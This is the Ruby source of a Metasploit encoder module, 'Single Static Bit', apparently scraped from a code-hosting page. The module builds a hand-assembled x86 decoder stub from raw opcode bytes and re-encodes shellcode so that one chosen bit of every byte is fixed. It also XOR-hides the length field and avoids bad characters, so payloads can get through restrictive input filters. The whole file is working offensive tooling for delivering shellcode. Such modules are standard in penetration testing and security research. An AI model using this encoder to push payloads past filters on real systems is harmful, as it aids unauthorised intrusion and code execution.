Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
#
7
# NOTE: this encoder currently has only be tested using bit 5 set to on.
8
#
9
# The decoder has been tested with all possible values, but the decoder stub
10
# is was not designed to bypass restrictions other than "bit 5 must be on"..
11
#
12
class MetasploitModule < Msf::Encoder
13

14
  # This encoder has a manual ranking because it should only be used in cases
15
  # where information has been explicitly supplied, specifically
16
  # BitNumber and BitValue.
17
  Rank = ManualRanking
18

19
  def initialize
20
    super(
21
      'Name'             => 'Single Static Bit',
22
      'Description'      => 'Static value for specific bit',
23
      'Author'           => 'jduck',
24
      'Arch'             => ARCH_X86,
25
      'License'          => MSF_LICENSE,
26
      'EncoderType'      => Msf::Encoder::Type::SingleStaticBit
27
      )
28

29
    # this shouldn't be present in the decoder stub.
30
    @key_marker = 0x1010
31
  end
32

33
  #
34
  # Returns the decoder stub that is adjusted for the size of
35
  # the buffer being encoded
36
  #
37
  def decoder_stub(state)
38

39
    bit_num = (datastore['BitNumber'] || 5).to_i
40
    bit_val = (datastore['BitValue'] || true)
41

42
    # variables:
43
    # bit to ignore                                  (global - hardcoded)
44
    # buf len (can be deduced with a jmp/call/pop)   (global - ebx)
45
    # current source byte ptr                        (global - esi)
46
    # current dest byte ptr                          (global - edi) ?
47
    # current dest byte                              (global - ah)  ?
48
    # number of bits accumulated                     (global - ebp) ?
49
    # current source byte                            (outer  - al)
50
    # bit index (for this byte)                      (inner  - cl)  ?
51
    pre_init = ""
52
    pre_init << "\x31\xed"        # xor ebp, ebp               - no bits accumulated
53
    pre_init << "\x83\xe1\x01"    # and ecx, $0x1              - init inner loop counter (set to 0/1)
54
    pre_init << "\x83\xe3\x01"    # and ebx, $0x1              - init buffer length
55
    pre_init << "\x66\xbb" + [@key_marker].pack('v')         # - load encrypted buffer length
56
    pre_init << "\x66\x81\xf3" + [@key_marker].pack('v')     # - xor decrypt buffer length
57

58
    # we stored an entire byte, move to the next one
59
    next_byte = ""
60
    next_byte << "\x83\xef\xff"  # sub edi, 0xffffffff         - increment dst pointer
61
    next_byte << "\x31\xed"      # xor ebp, ebp                - no bits accumulated
62

63
    # inside the loop, we need to extract a bit, as
64
    # specified by:
65
    #
66
    # ecx-1  - bit number to extract
67
    # al     - byte to extract it from
68
    get_a_bit = ""
69
    get_a_bit << "\x60"          # pusha                       - save all registers
70
    get_a_bit << "\x83\xe9\x01"  # sub ecx, 1                  - account for 1-based counting
71
    get_a_bit << "\x74\x06"      # jz +6                       - skip dividing if bit zero
72
    get_a_bit << "\xb3\x02"      # mov bl, 2                   - set divisor to 2
73
    # divide_it:
74
    get_a_bit << "\xf6\xf3"      # div bl                      - do the division
75
    get_a_bit << "\xe2" + [-1 * (2+2)].pack('C')             # - divide again..
76
    # store_bit:
77
    get_a_bit << "\x83\xe0\x01"  # and eax, 0x01               - we only want the lowest bit
78
    get_a_bit << "\x6b\x2f\x02"  # imul ebp, 2, [edi]          - load [edi], shifted left by 1, to ebp
79
    get_a_bit << "\x09\xe8"      # or ebp, eax                 - set bit 0
80
    get_a_bit << "\xaa"          # stosb al, [edi]             - store byte back
81
    get_a_bit << "\x61"          # popa                        - restore previous ebx/eax
82
    get_a_bit << "\x83\xed\xff"  # sub ebp, 0xffffffff         - increment bits stored
83

84
    inner_init = ""
85
    inner_init << "\xb1\x08"      # mov cl, $0x8               - init loop counter
86

87
    inner_loop = ""
88
    # process_bits:
89
    inner_loop << "\x80\xf9"     # cmp cl, <ignore_bit + 1>   - is this the one to ignore?
90
    inner_loop << [(bit_num+1)].pack('C')
91
    len = get_a_bit.length + 3 + 2 + next_byte.length
92
    inner_loop << "\x74" + [len].pack('C')                   # - je next_bit
93
    inner_loop << get_a_bit
94
    inner_loop << "\x83\xfd\x08"  # cmp ebp, $0x8              - got 8 bits now?
95
    inner_loop << "\x75" + [next_byte.length].pack('C')      # - jne to next_bit
96
    # next_dst_byte:
97
    inner_loop << next_byte
98
    # next_bit:
99
    # I really wish this silly padding wasn't necessary, however removing the bad characters in the
100
    # jump/call displacements has proven difficult otherwise.
101
    inner_loop << "\x90" * 0x1a   # nops                       - for padding (so relative jumps don't have badchars)
102
    len = -1 * (inner_loop.length+2)
103
    inner_loop << "\xe2" + [len].pack('C')                   # - loop process_bits
104

105
    # prefixed by:                # jmp data_beg_call
106
    outer_init = ""
107
    # get_data_beg:
108
    outer_init << "\x5e"          # pop esi                    - ptr to beginning of data
109
    outer_init << pre_init
110
    outer_init << "\x89\xf7"      # mov edi, esi               - decode in place, init dst ptr
111

112
    outer_loop = ""
113
    #outer_loop << "\x90" * (0xd+6)
114
    outer_loop << "\x83\xe0\x7f"  # and eax, 0x7f              - we only want the low byte
115
    outer_loop << "\xac"          # lods   al, [esi]           - load src byte
116
    outer_loop << inner_init << inner_loop
117
    outer_loop << "\x83\xeb\x01"  # sub ebx, 1                 - 1 byte down!
118
    outer_loop << "\x74\x07"      # jz +(2+5)                  - jump to data!
119
    len = -1 * (outer_loop.length+2)
120
    # next_byte:
121
    outer_loop << "\xeb" + [len].pack('C')                   # - jmp process_byte
122
    # data_beg_call:
123

124
    decoder = outer_init + outer_loop
125
    jmp = "\xeb" + [decoder.length].pack('C')
126
    call = "\xe8" + [-1 * (decoder.length+5)].pack('V')
127
    decoder = jmp + decoder + call
128

129
    # encoded sled
130
    state.context = ''
131

132
    return decoder
133
  end
134

135
  def encode_block(state, block)
136
    bit_num = (datastore['BitNumber'] || 5).to_i
137
    bit_num = (7-bit_num)
138
    bit_val = (datastore['BitValue'] || true)
139

140
    encoded = ''
141
    new_byte = 0
142
    nbits = 0
143

144
    block.unpack('C*').each do |ch|
145
      7.step(0,-1) do |x|
146

147
        # is this the special bit?
148
        if (nbits == bit_num)
149
          new_byte <<= 1 if nbits > 0
150
          new_byte |= 1 if bit_val
151
          nbits += 1
152

153
          # do we have a full byte?
154
          if nbits == 8
155
            encoded << new_byte.chr
156
            new_byte = 0
157
            nbits = 0
158
          end
159
        end
160

161
        # we have space, add it in
162
        new_byte <<= 1 if nbits > 0
163
        new_byte += 1 if (((ch >> x) & 1) > 0)
164
        nbits += 1
165

166
        # do we have a full byte?
167
        if nbits == 8
168
          encoded << new_byte.chr
169
          new_byte = 0
170
          nbits = 0
171
        end
172
      end
173
    end
174

175
    # if we have bits left, pad out to a whole byte
176
    if nbits > 0
177
      while nbits < 8
178
        new_byte <<= 1
179
        new_byte |= 1 if (nbits == bit_num) and bit_val
180
        nbits += 1
181
      end
182
      encoded << new_byte.chr
183
    end
184

185
    return encoded
186
  end
187

188
  #
189
  # Appends the encoded context portion.
190
  #
191
  def encode_end(state)
192
    state.encoded += state.context
193

194
    xor_key = 0
195
    xor_key_str = ''
196
    enc_len_str = ''
197
    loop do
198
      xor_key = rand(0x10000)
199
      xor_key_str = [xor_key].pack('v')
200
      enc_len_str = [state.encoded.length ^ xor_key].pack('v')
201
      next if has_badchars?(xor_key_str, state.badchars)
202
      next if has_badchars?(enc_len_str, state.badchars)
203
      break
204
    end
205

206
    marker_str = [@key_marker].pack('v')
207

208
    state.encoded.sub!(marker_str, enc_len_str)
209
    state.encoded.sub!(marker_str, xor_key_str)
210
  end
211
end
212

213